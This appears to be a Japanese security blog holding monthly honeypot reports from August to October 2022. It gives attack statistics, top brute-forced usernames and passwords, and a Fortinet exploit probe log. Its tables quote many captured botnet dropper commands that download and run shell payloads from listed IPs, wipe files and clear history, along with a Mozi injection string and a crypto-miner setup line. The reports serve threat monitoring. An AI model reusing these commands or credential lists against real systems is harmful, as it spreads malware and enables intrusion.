ハニーポット運用(月次報告:2022年10月)

今月のTopics

１．Fortinet製製品における認証バイパスの脆弱性

Fortinet製FortiOS、FortiProxyおよびFortiSwitchManagerの認証バイパスの脆弱性（CVE-2022-40684）に関する注意喚起が報告された。

PoCも多数公開されている。認証回避の脆弱性を悪用して、指定したユーザーのSSH鍵を設定する。

上記アクセスを確認すると調査用アクセスとして、数回のアクセスを観測した。PoCを使って動作検証をしており、501エラーで相手方へ戻っているようだ。 ※相手先ポートは80,81,9200が使われていた。

{
  "dest_ip": [
    "***.***.***.***"
  ],
  "dest_port": [
    9200
  ],
  "event_type": [
    "http"
  ],
  "geoip.city_name": [
    "London"
  ],
  "geoip.ip": [
    "212.71.255.156"
  ],
  "geoip.region_name": [
    "England"
  ],
  "geoip.timezone.keyword": [
    "Europe/London"
  ],
  "http.http_method": [
    "PUT"
  ],
  "http.http_port": [
    9200
  ],
  "http.http_user_agent": [
    "Report Runner"
  ],
  "http.protocol": [
    "HTTP/1.1"
  ],
  "http.status": [
    501
  ],
  "http.url": [
    "/api/v2/cmdb/system/admin/admin"
  ],
  "proto": [
    "TCP"
  ],
  "src_ip": [
    "212.71.255.156"
  ],
  "src_port": [
    33712
}

２．CodeBlue & AVTokyo参加

業務多忙の合間をぬってCodeBlue と AVTokyoに参加した。
・CodeBlueはC2サーバ関連の発表が特に印象的だった。C2情報をビットコインにのせる攻撃者の発想(ブロックチェーンに書き込まれた情報の削除は非常に困難)も凄いが、接続元IPを判定しないバグからシンクホールに追い込む発表者様の発想はもっと凄い。
・AVTokyoは初めてオフライン参加したが色々参考になった。知らない参加者の人にも積極的に声掛けできるようなコミュニケーション能力が必要だと痛感した。

T-Potにて1か月運用した結果を記載する。

今月のChangelog

　更新無し。

前提条件

運用日時：2022年10月1日-2022年10月31日

運用期間：31日

結果

①各ハニーポットで検知したAttack件数

T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。

No	ハニーポット	件数	先月比
1	Ddospot	1,282,416	375,696
2	Cowrie	1,047,739	213,126
3	Heralding	786,088	258,293
4	Honeytrap	567,423	276,038
5	Dionaea	272,534	6,190
6	Mailoney	19,240	▲5,497
7	Adbhoney	18,015	3,838
8	Tanner	5,586	1,295
9	ConPot	2,761	494
10	Redishoneypot	2,661	566
11	Ciscoasa	2,140	1,001
12	ElasticPot	1,972	1,129
13	CitrixHoneypot	1,766	490
14	Ipphoney	215	82
15	Dicompot	100	▲79

Result
- Mailoney、Dicompotのアクセス件数が減少

②攻撃元の国名と件数(Top 20)

各ハニーポットへの攻撃元の国名の総件数を以下に記載する。

No	攻撃元の国名	件数	先月順位
1	Brazil	803,104	1(→)
2	Russia	721,330	2(→)
3	United States	466,798	3(→)
4	China	320,982	4(→)
5	Netherlands	266,773	5(→)
6	France	94,263	14(↑)
7	United Kingdom	90,636	13(↑)
8	India	76,370	11(↑)
9	Japan	73,027	6(↓)
10	Singapore	64,220	9(↓)
11	Vietnam	62,292	10(↓)
12	Sweden	61,955	15(↑)
13	Germany	54,237	7(↓)
14	South Korea	45,540	12(↓)
15	Indonesia	33,432	18(↑)
16	Panama	30,925	圏外(↑)
17	Costa Rica	29,318	圏外(↑)
18	Hong Kong	27,679	圏外(↑)
19	Mexico	27,555	17(↓)
20	Latvia	26,590	16(↓)

Result
- Brazil(1位)～Netherlands(5位)までのアクセス順位に変動なし。
- Costa Rica(17位)のアクセスを新規に観測した。

③検知したCVEの脆弱性と件数

Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。

No	CVE ID	Count
1	CVE-2020-11899	387,526
2	CVE-2020-11910	41
3	CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255	6
4	CVE-1999-0016	1

Result
- 特記事項なし

④よく攻撃されるユーザ名

ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。

No	ユーザ名	件数
1	root	45,119
2	admin	7,579
3	nproc	3,331
4	user	3,046
5	postgres	2,472
6	test	2,350
7	(empty)	2,190
8	ubuntu	1,698
9	oracle	1,599
10	sa	1,554
11	22	1,283
12	support	983
13	steam	893
14	ftpuser	845
15	guest	823
16	testuser	661
17	!root	637
18	es	631
19	2Wire	629
20	git	617
21	mysql	521
22	www	495
23	pi	484
24	esuser	480
25	devops	457
26	hadoop	450
27	centos	404
28	ansible	387
29	vagrant	385
30	sh	376
31	dev	363
32	tester	363
33	666666	358
34	web	357
35	Admin	348
36	0	346
37	blank	346
38	ftp	339
39	cameras	333
40	minecraft	328
41	adm	327
42	unknown	325
43	$ALOC$	321
44	ubnt	320
45	debug	318
46	halo	313
47	jenkins	312
48	student	300
49	deploy	280
50	tomcat	277

Result
- 特記事項なし

⑤よく攻撃されるパスワード

パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。

No	パスワード	件数
1	123456	12,127
2	nproc	3,331
3	(empty)	3,045
4	123	2,751
5	admin	2,412
6	password	2,353
7	1234	1,640
8	12345	1,377
9	root	1,109
10	12345678	1,045
11	blank	960
12	1	810
13	0	766
14	user	765
15	test	758
16	ubnt	652
17	admin123	626
18	test123	620
19	support	552
20	00000000	507
21	666666	468
22	123456789	456
23	qwerty123	451
24	password123	444
25	alpine	394
26	111111	391
27	1qaz2wsx	374
28	test1234	373
29	abc123	372
30	master	372
31	1qaz@WSX	367
32	hi3518	361
33	Test1234	358
34	Aa123456	346
35	1234567890	338
36	Aa123456.	329
37	cameras	325
38	P@ssw0rd	323
39	backup	313
40	1q2w3e4r	308
41	10023	305
42	Test123	301
43	!ishtar	298
44	_Cisco	293
45	qwerty	288
46	unknown	285
47	synnet	284
48	1234567	282
49	123123	259
50	bzrx1098ui	249

Result
- 全体的なアクセス件数は低下。
- bzrx1098ui(50位)に新規パスワードを確認。脆弱なパスワードには含まれているが、どのような種類のパスワードかは不明

⑥今月のmasscanとZmap

masscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- 特記事項は無し。

最後に

AVTokyo2022のBadge、会社用に余分に購入したけど誰も欲しい人おらず。＿|￣|○il||li ｶﾞｯｸｼ･･il||li
10月はCodeBlue + AVTokyoと他セキュリティイベントが目白押しのため、有意義だが非常にhard!!

◆shファイルに関するアクセス

No	ファイル名	hash値(md5)	アクセス
1	1sh	-	rm -rf /var/run/1sh; wget -c htt[p]://92.207.203.157/x/1sh -P /var/run && sh /var/run/1sh &,
2	2sh	-	rm -rf /tmp/2sh; wget -c htt[p]://92.207.203.157/x/2sh -P /tmp && sh /tmp/2sh &,
3	23.sh	-	#!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget htt[p]://125.27.179.36/scripts/23s; curl -O htt[p]://125.27.179.36/scripts/23s; chmod +x 23s; ./23s; wget htt[p]://125.27.179.36/scripts/23; curl -O htt[p]://125.27.179.36/scripts/23; chmod +x 23; ./23; rm -rf 23.sh; history -c; ,
4	666.sh	86f1b914488183e170541692ffd31f8f	cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget htt[p]://109.206.241.129/666.sh; curl -O htt[p]://109.206.241.129/666.sh; chmod 777 666.sh; sh 666.sh; tftp 109.206.241.129 -c get t666.sh; chmod 777 t666.sh; sh t666.sh; tftp -r t6662.sh -g 109.206.241.129; chmod 777 t6662.sh; sh t6662.sh; ftpget -v -u anonymous -p anonymous -P 21 109.206.241.129 6661.sh 6661.sh; sh 6661.sh; rm -rf 666.sh t666.sh t6662.sh 6661.sh; rm -rf *,
5	adbc.sh	-	cd /data/local/tmp/; wget htt[p]://135.148.104.21/adb.sh; busybox wget htt[p]://135.148.104.21/adb.sh; sh adb.sh; curl htt[p]://135.148.104.21/adbc.sh; sh adbc.sh
6	andbg	-	busybox wget htt[p]://31.220.3.140/andbg -O- \| sh; busybox curl htt[p]://31.220.3.140/andbg \| sh,
7	bcurl	-	>/data/local/tmp/.x && cd /data/local/tmp; >/sdcard/0/Downloads/.x && cd /sdcard/0/Downloads; >/storage/emulated/0/Downloads && cd /storage/emulated/0/Downloads; rm -rf wget bwget bcurl curl; wget htt[p]://45.61.184.119/wget; sh wget; busybox wget htt[p]://45.61.184.119/bwget; sh bwget; busybox curl htt[p]://45.61.184.119/bcurl > bcurl; sh bcurl; curl htt[p]://45.61.184.119/curl > curl; sh curl,
8	bw.sh	0dc8d5729a91b903101d063fbb3565ba	cd /data/local/tmp/;rm -rf .sh; rm -rf .; wget htt[p]://185.156.73.178/bins/w.sh; busybox wget htt[p]://185.156.73.178/bins/bw.sh; sh bw.sh; curl -O htt[p]://185.156.73.178/bins/c.sh; sh c.sh; busybox curl -O htt[p]://185.156.73.178/bins/bc.sh; sh bc.sh,
9	c.sh	-	cd /data/local/tmp/; busybox wget htt[p]://bins.chxv8ybuh2ytmfvfwrulcdqtywlooiybaevwsa2b.org/w.sh; sh w.sh; curl htt[p]://bins.chxv8ybuh2ytmfvfwrulcdqtywlooiybaevwsa2b.org/c.sh; sh c.sh,
10	doge.sh	0ba62dd2750c230a7e610fa2d9c99746	cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget htt[p]://45.140.188.33/doge.sh; chmod 777 doge.sh; sh doge.sh; tftp 45.140.188.33 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.140.188.33; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.140.188.33 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf doge.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *,
11	hypnose.sh	91d188c8c1a3fd1a18ba12e52469b51b	cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget htt[p]://5.253.246.70/hypnose.sh; curl -O htt[p]://5.253.246.70/hypnose.sh; chmod 777 hypnose.sh; sh hypnose.sh; tftp 5.253.246.70 -c get hypnose.sh; chmod 777 hypnose.sh; sh hypnose.sh; tftp -r hypnose2.sh -g 5.253.246.70; chmod 777 hypnose2.sh; sh hypnose2.sh; ftpget -v -u anonymous -p anonymous -P 21 5.253.246.70 hypnose1.sh hypnose1.sh; sh hypnose1.sh; rm -rf hypnose.sh hypnose.sh hypnose2.sh hypnose1.sh; rm -rf *,
12	lol.sh	05d30b5bdeb2ddff9a8c5a24c00116f7	cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget htt[p]://37.139.128.107/lol.sh; curl -O htt[p]://37.139.128.107/lol.sh; chmod 777 lol.sh; sh lol.sh; tftp 37.139.128.107 -c get lol.sh; chmod 777 lol.sh; sh lol.sh; tftp -r lol2.sh -g 37.139.128.107; chmod 777 lol2.sh; sh lol2.sh; ftpget -v -u anonymous -p anonymous -P 21 37.139.128.107 lol1.sh lol1.sh; sh lol1.sh; rm -rf lol.sh lol.sh lol2.sh lol1.sh; rm -rf *,
13	ohshit.sh	0726ad2ea637587586557a4a07a8f5c2	cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget htt[p]://92.87.6.205/ohshit.sh; curl -O htt[p]://92.87.6.205/ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp 92.87.6.205 -c get ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp -r ohshit2.sh -g 92.87.6.205; chmod 777 ohshit2.sh; sh ohshit2.sh; ftpget -v -u anonymous -p anonymous -P 21 92.87.6.205 ohshit1.sh ohshit1.sh; sh ohshit1.sh; rm -rf ohshit.sh ohshit.sh ohshit2.sh ohshit1.sh; rm -rf *,
14	sensi.sh	6197d45d92ade6b1ae9b3609412939ac	cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget htt[p]://185.117.3.120/sensi.sh; curl -O htt[p]://185.117.3.120/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 185.117.3.120 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 185.117.3.120; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.117.3.120 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *,
15	shr	-	rm -rf shr; wget htt[p]://46.23.109.47/shr \|\| curl -O htt[p]://46.23.109.47/shr \|\| tftp 46.23.109.47 -c get shr \|\| tftp -g -r shr 46.23.109.47; chmod 777 shr;./shr ssh; rm -rf shr,
16	sshc.sh	05c4e4aab0fd5ee629123a4d6a51e21e	cd /tmp; wget htt[p]://179.43.175.5/ssh.sh; chmod 777 ssh.sh; sh ssh.sh; curl htt[p]://179.43.175.5/sshc.sh -o sshc.sh; chmod 777 sshc.sh; sh sshc.sh; rm -rf *;,
17	test.sh	cd3bc3e3adc45fd96640d27d1ebc9dbe	cd /tmp; rm -rf test.sh; wget htt[p]://179.43.175.5/test.sh; curl htt[p]://179.43.175.5/test.sh -o test.sh; chmod 777 test.sh; ./test; sh test.sh,
18	tftp1.sh	-	cd /tmp \|\| cd /var/run \|\|cd /mnt \|\| cd /root \|\| cd /; wget htt[p]://147.182.161.44/SnOoPy.sh; chmod 777 ; sh SnOoPy.sh; tftp -g 147.182.161.44 -r tftp1.sh; chmod 777 ; sh tftp1.sh; rm -rf *.sh; history -c,
19	w.sh	-	cd /data/local/tmp/; busybox wget htt[p]://107.182.129.219/w.sh; sh w.sh android.exploit; curl htt[p]://107.182.129.219/c.sh; sh c.sh android.exploit,
20	wget.sh	162ee53ef9df69eb808f72492d1390c0	cd /data/local/tmp/; busybox wget htt[p]://141.98.6.110/w.sh; sh w.sh; curl htt[p]://141.98.6.110/c.sh; sh c.sh; wget htt[p]://141.98.6.110/wget.sh; sh wget.sh; curl htt[p]://141.98.6.110/wget.sh; sh wget.sh; busybox wget htt[p]://141.98.6.110/wget.sh; sh wget.sh; busybox curl htt[p]://141.98.6.110/wget.sh; sh wget.sh,
21	wwww	c08752a9c35abaf1ab3f61830fb92e4a	cd /data/local/tmp; busybox wget htt[p]://5.206.227.228/wget -O -> wwww; sh wwww; curl -O htt[p]://5.206.227.228/curl; sh curl; rm wwww curl,
22	string.js	d1a7cdaa1eda1b2bb1a2daeec1943da0	/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}htt[p]://175.107.13.18:55939/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
23	wget.sh	078e9a9b315d76ae99d7449aa8182fee	/cgi-bin/;cd+/tmp;wget+htt[p]:/45.95.55.214/a/wget.sh;chmod+777+wget.sh;sh+wget.sh+Netgear;rm+-rf+wget.sh

◆exeファイルに関するアクセス

無し

今月の作業BGM

曲名	アーティスト	備考
You Can Call Me Al	Paul Simon	---

2022-11-20

ハニーポット運用(月次報告:2022年9月)

Honeypot セキュリティ

今月のTopics

9月もサイバー攻撃に関連したニュースが多く報道された。

9月上旬に日本にサイバー攻撃を仕掛けた親ロシア派ハッカー集団「キルネット(Killnet)」が資金難により、攻撃活動を事実上停止した。 Killnetは９月上旬、大量のデータを送り付けてシステム障害を起こすDDoS攻撃を実行。デジタル庁や総務省などの省庁のサイトや、東京メトロやミクシィなどの企業サイトを一時的に閲覧できなくした。これまで「ロシア政府との関係はなく、活動資金はすべて募金で賄っている」と説明していたが、９月下旬に入り、ロシア国内にある複数の金融機関の口座が凍結されたという。キルネットの創設者は２７日、匿名性の高い通信アプリ「テレグラム」に「予算もサーバーもなく、活動を継続できない」と投稿した。

株式会社明治のシンガポール子会社にて身代金要求型コンピューターウイルス「ランサムウエア」によるサイバー攻撃を受け、１０万ドル（約１４００万円）の支払いを要求されている。攻撃者は世界最大のサイバー犯罪集団「ロックビット3.0」匿名性の高いダークウェブのサイトに犯行声明を出し、９月２５日までに１０万ドルを支払わないと盗んだ情報を公開すると脅迫しているとのこと。攻撃を受けたのは菓子の製造や輸入販売を行う子会社のメイジセイカ・シンガポール。８月２９日朝、事務所内のパソコンを起動したところ、プリンターが身代金を要求するメッセージを大量に印刷した。調査したところ、ロックビットのランサムウエアに感染していた。

T-Potにて1か月運用した結果を記載する。

今月のChangelog

　更新無し。

前提条件

運用日時：2022年9月8日-2022年9月30日

運用期間：22日

結果

①各ハニーポットで検知したAttack件数

T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。

No	ハニーポット	件数	先月比
1	Ddospot	906,720	▲341,922
2	Cowrie	834,613	▲331,222
3	Heralding	527,795	▲90,265
4	Honeytrap	291,385	▲332,969
5	Dionaea	266,344	▲21,136
6	Mailoney	24,737	▲15,313
7	Adbhoney	14,177	2,155
8	Tanner	4,291	▲2,534
9	ConPot	2,267	▲838
10	Redishoneypot	2,095	▲14,383
11	CitrixHoneypot	1,276	▲1,354
12	Ciscoasa	1,139	▲1,235
13	ElasticPot	843	▲196
14	Dicompot	179	96
15	Ipphoney	133	▲38

Result
- 先月に引き続きDdospotの攻撃割合が多かった。

②攻撃元の国名と件数(Top 20)

各ハニーポットへの攻撃元の国名の総件数を以下に記載する。

No	攻撃元の国名	件数	先月順位
1	Brazil	656,817	1(→)
2	Russia	492,843	4(↑)
3	United States	319,679	2(↓)
4	China	175,225	5(↑)
5	Netherlands	138,947	3(↓)
6	Japan	119,405	10(↑)
7	Germany	98,728	12(↑)
8	Morocco	78,177	圏外(↑)
9	Singapore	57,403	11(↑)
10	Vietnam	54,799	8(↓)
11	India	50,688	7(↓)
12	South Korea	35,664	13(↑)
13	United Kingdom	35,427	9(↓)
14	France	30,509	16(↑)
15	Sweden	26,376	14(↓)
16	Latvia	24,139	15(↓)
17	Mexico	23,055	20(↓)
18	Indonesia	23,030	6(↓)
19	Taiwan	21,363	圏外(↑)
20	Canada	20,672	19(↓)

Result
- ブラジル(1位)、ロシア(2位)、中国(5位)からのアクセスが多かった。
- ウクライナ戦争に関連した攻撃は一見無いように見える。

③検知したCVEの脆弱性と件数

Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。

No	CVE ID	Count
1	CVE-2020-11899	426,486
2	CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255	620
3	CVE-2020-11910	294
4	CVE-1999-0016	13

Result
- 先月から変更なし

④よく攻撃されるユーザ名

ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。

No	ユーザ名	件数
1	root	98,707
2	admin	7,613
3	nproc	4,870
4	user	3,640
5	test	2,258
6	(empty)	2,249
7	sa	2,239
8	support	1,621
9	22	1,331
10	ubuntu	832
11	oracle	824
12	ftpuser	790
13	postgres	693
14	!root	668
15	2Wire	659
16	guest	447
17	hadoop	418
18	git	416
19	unknown	379
20	blank	378
21	adm	374
22	cameras	351
23	ubnt	351
24	666666	350
25	debug	338
26	$ALOC$	329
27	0	328
28	test1	326
29	test2	299
30	mysql	289
31	minecraft	278
32	www	266
33	usuario	260
34	testuser	248
35	centos	242
36	student	231
37	esuser	230
38	deploy	216
39	pi	209
40	nagios	206
41	debian	199
42	ftp	198
43	es	192
44	ts3	188
45	ansible	187
46	ec2-user	168
47	nobody	156
48	steam	155
49	default	144
50	upload	144

Result
- 先月から変更なし

⑤よく攻撃されるパスワード

パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。

No	パスワード	件数
1	nproc	4,870
2	admin	3,994
3	123456	3,826
4	(empty)	3,234
5	password	1,933
6	1	1,770
7	123	1,355
8	12345	1,308
9	suport	1,037
10	root	1,009
11	1234	1,003
12	blank	996
13	12345678	963
14	test	713
15	0	691
16	user	564
17	Aa123456.	551
18	qwerty	511
19	ubnt	475
20	support	449
21	00000000	439
22	666666	427
23	alpine	389
24	master	371
25	backup	368
26	1qaz2wsx	358
27	hi3518	354
28	cameras	351
29	unknown	344
30	synnet	336
31	!ishtar	334
32	_Cisco	328
33	10023	323
34	1q2w3e4r	311
35	Password	295
36	123123	282
37	guest	276
38	111111	274
39	minecraft	250
40	123456789	246
41	pass	219
42	abc123	208
43	Passw0rd	203
44	a	201
45	password123	192
46	toor	191
47	P@ssw0rd	190
48	1qaz@WSX	189
49	J5cmmu=Kyf0-br8CsW	182
50	1q2w3e	181

Result
- 先月に引き続きJ5cmmu=Kyf0-br8CsW|182のパスワードが確認された。

⑥今月のmasscanとZmap

masscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- 特記事項は無し。

最後に

shファイルとexeファイル関連の問い合わせは以下の通り。

◆shファイルに関するアクセス

No	ファイル名	hash値(md5)	アクセス
1	interact.sh	61aeec46a50c9ea8268014d2e7f0c0ef	htt[p]s://XXX.XXX.XXX.XXX/u001B]8;;htt[p]s:/interact.sh"/onmouseover="alert(1)/u0007example/u001B]8;;/u0007
2	ExportLogs.sh	61aeec46a50c9ea8268014d2e7f0c0ef	htt[p]s://XXX.XXX.XXX.XXX/cgi-bin/ExportLogs.sh
3	sensi.sh	e5dae88067ee34460dc374e4a7ce88cf	htt[p]://159.223.123.120/cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget htt[p]://159.223.123.120/sensi.sh; curl -O htt[p]://159.223.123.120/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 159.223.123.120 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 159.223.123.120; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 159.223.123.120 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
4	doge.sh	f70871420065756df1bb84627fc7a34a	cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget htt[p:]//46.23.109.212/doge.sh; chmod 777 doge.sh; sh doge.sh; tftp 46.23.109.212 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 46.23.109.212; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 46.23.109.212 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf doge.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
5	ohshit.sh	7400c153a4b749d22af43b5cbfae3bfa	cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget htt[p]://92.87.6.205/ohshit.sh; curl -O htt[p]://92.87.6.205/ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp 92.87.6.205 -c get ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp -r ohshit2.sh -g 92.87.6.205; chmod 777 ohshit2.sh; sh ohshit2.sh; ftpget -v -u anonymous -p anonymous -P 21 92.87.6.205 ohshit1.sh ohshit1.sh; sh ohshit1.sh; rm -rf ohshit.sh ohshit.sh ohshit2.sh ohshit1.sh; rm -rf *
6	snoopybins.sh	ef98cd7dd72ed4bb841b114edd8843fd	cd /tmp \|\| cd /run \|\| cd /; wget htt[p]://45.140.188.40/snoopybins.sh; chmod 777 snoopybins.sh; sh snoopybins.sh; tftp 45.140.188.40 -c get snoopytftp1.sh; chmod 777 snoopytftp1.sh; sh snoopytftp1.sh; tftp -r snoopytftp2.sh -g 45.140.188.40; chmod 777 snoopytftp2.sh; sh snoopytftp2.sh; rm -rf snoopybins.sh snoopytftp1.sh snoopytftp2.sh; rm -rf *
7	setup_c3pool_miner.sh	-	echo root:23jh133742any1\|chpasswd\|bash; lspci \| grep VGA \|\| lspci \| grep 3D; nvidia-smi; cat/etc/issue; uname -a; curl -s -L htt[p]://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh \| LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1

◆exeファイルに関するアクセス

無し

今月の作業BGM

曲名	アーティスト	備考
The Nights	Avicii	---

2022-09-03

ハニーポット運用(月次報告:2022年8月)

Honeypot セキュリティ

今月のTopics

・2022年8月11日 – 2022年8月14日にDEF CON30が開催された。時間面および金銭面の都合により全く関係ないイベントだが、いつかは参加したい。

・アルミ電解コンデンサの世界トップシェアをもつ日本ケミコン株式会社にて管理サーバへの不正アクセスがあったとの発表があった。幸いデータの改ざんやシステムダウンなどの業務影響は発生していないとのことだが、2021年10月に三菱電機株式会社で安保情報を含む情報が流出したように、世界的なシェアを占める日本企業の機密情報の保護についてより一層の注力が必要になるだろう。 www.chemi-con.co.jp

T-Potにて1か月運用した結果を記載する。

今月のChangelog

　更新無し。

前提条件

運用日時：2022年8月1日-2022年8月31日

運用期間：31日

結果

①各ハニーポットで検知したAttack件数

T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。

No	ハニーポット	件数	先月比
1	Ddospot	1,248,642	▲909,493
2	Cowrie	1,165,835	136,256
3	Honeytrap	624,354	167,770
4	Heralding	618,060	163,578
5	Dionaea	287,480	33,917
6	Mailoney	40,050	▲9,643
7	Redishoneypot	16,478	14,013
8	Adbhoney	12,022	658
9	Tanner	6,825	311
10	ConPot	3,105	525
11	CitrixHoneypot	2,630	827
12	Ciscoasa	2,374	922
13	ElasticPot	1,039	▲86
14	Ipphoney	171	▲2
15	Dicompot	83	2

Result
- 全体的な傾向は先月から変更なし

②攻撃元の国名と件数(Top 20)

各ハニーポットへの攻撃元の国名の総件数を以下に記載する。

No	攻撃元の国名	件数	先月順位
1	Brazil	707,292	1(→)
2	United States	635,955	2(→)
3	Netherlands	431,590	3(→)
4	Russia	326,332	5(↑)
5	China	265,023	4(↓)
6	Indonesia	112,324	15(↑)
7	India	83,841	9(↑)
8	Vietnam	80,105	10(↑)
9	United Kingdom	76,068	11(↑)
10	Japan	73,800	8(↓)
11	Singapore	64,731	6(↓)
12	Germany	59,104	7(↓)
13	South Korea	51,457	11(↓)
14	Sweden	35,542	19(↑)
15	Latvia	33,053	20(↑)
16	France	32,451	14(↓)
17	Hong Kong	27,316	16(↓)
18	Bangladesh	26,262	13(↓)
19	Canada	23,391	18(↓)
20	Mexico	22,773	圏外(↑)

Result
- ブラジル、アメリカ、ニュージーランドからのアクセスが依然として多かった。
- 上位3か国の宛先ポートとして、ブラジルは53(647,154件)、アメリカは123(128,414件)、ニュージーランドは5900(349,378件)であった。

No	country	dest_port	件数	備考
1	Brazil	53	647,154	DNS
2	United States	123	128,414	NTP
3	Netherlands	5900	349,378	VNC

③検知したCVEの脆弱性と件数

Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。

No	CVE ID	Count
1	CVE-2020-11899	293,801
2	CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255	7,820
3	CVE-2020-11910	1,009
4	CVE-1999-0016	2

Result
- 先月から変更なし

④よく攻撃されるユーザ名

ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。

No	ユーザ名	件数
1	root	98,707
2	admin	7,613
3	nproc	4,870
4	user	3,640
5	test	2,258
6	(empty)	2,249
7	sa	2,239
8	support	1,621
9	22	1,331
10	ubuntu	832
11	oracle	824
12	ftpuser	790
13	postgres	693
14	!root	668
15	2Wire	659
16	guest	447
17	hadoop	418
18	git	416
19	unknown	379
20	blank	378
21	adm	374
22	cameras	351
23	ubnt	351
24	666666	350
25	debug	338
26	$ALOC$	329
27	0	328
28	test1	326
29	test2	299
30	mysql	289
31	minecraft	278
32	www	266
33	usuario	260
34	testuser	248
35	centos	242
36	student	231
37	esuser	230
38	deploy	216
39	pi	209
40	nagios	206
41	debian	199
42	ftp	198
43	es	192
44	ts3	188
45	ansible	187
46	ec2-user	168
47	nobody	156
48	steam	155
49	default	144
50	upload	144

Result
- ec2-user(46位)について、Amazon Linux2(EC2)のec2-user(デフォルトユーザー)に対するアクセスが確認された。AWSのようなインターネット経由でのアクセスが可能な環境においては特にセキュリティを意識する必要があるだろう。

⑤よく攻撃されるパスワード

パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。

No	パスワード	件数
1	nproc	4,870
2	admin	3,994
3	123456	3,826
4	(empty)	3,234
5	password	1,933
6	1	1,770
7	123	1,355
8	12345	1,308
9	suport	1,037
10	root	1,009
11	1234	1,003
12	blank	996
13	12345678	963
14	test	713
15	0	691
16	user	564
17	Aa123456.	551
18	qwerty	511
19	ubnt	475
20	support	449
21	00000000	439
22	666666	427
23	alpine	389
24	master	371
25	backup	368
26	1qaz2wsx	358
27	hi3518	354
28	cameras	351
29	unknown	344
30	synnet	336
31	!ishtar	334
32	_Cisco	328
33	10023	323
34	1q2w3e4r	311
35	Password	295
36	123123	282
37	guest	276
38	111111	274
39	minecraft	250
40	123456789	246
41	pass	219
42	abc123	208
43	Passw0rd	203
44	a	201
45	password123	192
46	toor	191
47	P@ssw0rd	190
48	1qaz@WSX	189
49	J5cmmu=Kyf0-br8CsW	182
50	1q2w3e	181

Result
- J5cmmu=Kyf0-br8CsW(49位)について、不思議なパスワードを確認した。攻撃自体はリバースブルートフォース攻撃としてパスワードを固定した上で、ユーザ名部分を変更しながら試行している。

本パスワードは海外でも情報を求めている方がいるようで、情報提供募集中とのこと。

CHALLENGE: @hackaday
Password J5cmmu=Kyf0-br8CsW This doesn’t seem to show up anywhere other than the list of commonly guessed passwords. [David] asks for information on this password guess, if anybody knows where it’s from, and I’ll echo that curiosity.https://t.co/5mycksXpzN
— Netmux (@netmux) 2020年9月12日

⑥今月のmasscanとZmap

masscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- 特記事項は無し。

最後に

今月も新規のmaliciousなファイルがBash系のファイルにて確認された。

◆shファイルに関するアクセス

No	ファイル名	hash値(md5)	アクセス
